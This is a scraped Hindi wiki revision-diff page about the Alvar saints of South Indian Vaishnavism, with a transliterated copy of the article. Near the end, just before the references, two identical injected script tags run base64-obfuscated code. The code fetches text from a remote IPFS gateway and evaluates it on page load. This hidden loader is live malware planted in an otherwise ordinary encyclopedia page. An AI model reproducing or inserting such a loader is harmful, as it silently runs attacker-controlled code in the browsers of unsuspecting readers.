Difference between revisions of "आलवार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " दुख " to " दु:ख ")
Line 3: Line 3:
 
जब कभी भी [[भारत]] में विदेशियों के प्रभाव से [[धर्म]] के लिए ख़तरा उत्पन्न हुआ, तब-तब अनेक सन्तों ने लोक मानस में [[धर्म]] की पवित्र धारा बहाकर उसकी रक्षा करने का प्रयत्न किया। दक्षिण भारत के आलवार सन्तों की भी यही भूमिका रही है। 'आलवार' का अर्थ होता है कि "जिसने अध्यात्म-ज्ञान रूपी [[समुद्र]] में गोता लगाया हो।" आलवार संत '[[गीता]]' की सजीव मूर्ति थे। वे [[उपनिषद|उपनिषदों]] के उपदेश के जीते जागते उदाहरण थे।<ref name="mcc">{{cite web |url=http://www.livehindustan.com/news/editorial/guestcolumn/article1-story-57-62-75659.html |title=आलवार सन्त|accessmonthday=19 मई|accessyear=2012|last=देवसरे|first=डॉक्टर हरिकृष्ण|authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
जब कभी भी [[भारत]] में विदेशियों के प्रभाव से [[धर्म]] के लिए ख़तरा उत्पन्न हुआ, तब-तब अनेक सन्तों ने लोक मानस में [[धर्म]] की पवित्र धारा बहाकर उसकी रक्षा करने का प्रयत्न किया। दक्षिण भारत के आलवार सन्तों की भी यही भूमिका रही है। 'आलवार' का अर्थ होता है कि "जिसने अध्यात्म-ज्ञान रूपी [[समुद्र]] में गोता लगाया हो।" आलवार संत '[[गीता]]' की सजीव मूर्ति थे। वे [[उपनिषद|उपनिषदों]] के उपदेश के जीते जागते उदाहरण थे।<ref name="mcc">{{cite web |url=http://www.livehindustan.com/news/editorial/guestcolumn/article1-story-57-62-75659.html |title=आलवार सन्त|accessmonthday=19 मई|accessyear=2012|last=देवसरे|first=डॉक्टर हरिकृष्ण|authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
====संख्या====
 
====संख्या====
आलवार सन्तों की संख्या 12 मानी गई है। उन्होंने भगवान [[नारायण]], [[श्रीराम]] और [[श्रीकृष्ण]] आदि के गुणों का वर्णन करने वाले हज़ारों पदों की रचना की थी। इन पदों को सुनकर व गाकर आज भी लोग [[भक्ति रस]] में डूब जाते हैं। आलवार संत प्रचार और लोकप्रियता से दूर ही रहते थे। ये इतने सरल और सीधे स्वभाव के संत होते थे कि न तो किसी को दुख पहुंचाते थे और न ही किसी से कुछ अपेक्षा करते थे।<ref name="mcc"/>
+
आलवार सन्तों की संख्या 12 मानी गई है। उन्होंने भगवान [[नारायण]], [[श्रीराम]] और [[श्रीकृष्ण]] आदि के गुणों का वर्णन करने वाले हज़ारों पदों की रचना की थी। इन पदों को सुनकर व गाकर आज भी लोग [[भक्ति रस]] में डूब जाते हैं। आलवार संत प्रचार और लोकप्रियता से दूर ही रहते थे। ये इतने सरल और सीधे स्वभाव के संत होते थे कि न तो किसी को दु:ख पहुंचाते थे और न ही किसी से कुछ अपेक्षा करते थे।<ref name="mcc"/>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}

Revision as of 14:03, 2 June 2017

alavar vaishnav sampraday ke sant the, jinhoanne eesa ki satavian-athavi shatabdi mean dakshin bharat mean 'bhaktimarg' ka prachar kiya. in santoan mean nathamuni, yamunachary aur ramanujachary adi pramukh the. ramanuj ne 'vishishtadvait siddhant' ka pratipadan kiya tha, jo shankarachary ke 'advaitavad' ka sanshodhit roop tha.

dharm rakshak

jab kabhi bhi bharat mean videshiyoan ke prabhav se dharm ke lie khatara utpann hua, tab-tab anek santoan ne lok manas mean dharm ki pavitr dhara bahakar usaki raksha karane ka prayatn kiya. dakshin bharat ke alavar santoan ki bhi yahi bhoomika rahi hai. 'alavar' ka arth hota hai ki "jisane adhyatm-jnan roopi samudr mean gota lagaya ho." alavar sant 'gita' ki sajiv moorti the. ve upanishadoan ke upadesh ke jite jagate udaharan the.[1]

sankhya

alavar santoan ki sankhya 12 mani gee hai. unhoanne bhagavan narayan, shriram aur shrikrishna adi ke gunoan ka varnan karane vale hazaroan padoan ki rachana ki thi. in padoan ko sunakar v gakar aj bhi log bhakti ras mean doob jate haian. alavar sant prachar aur lokapriyata se door hi rahate the. ye itane saral aur sidhe svabhav ke sant hote the ki n to kisi ko du:kh pahuanchate the aur n hi kisi se kuchh apeksha karate the.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 devasare, d aauktar harikrishna. alavar sant (hindi). . abhigaman tithi: 19 mee, 2012.

sanbandhit lekh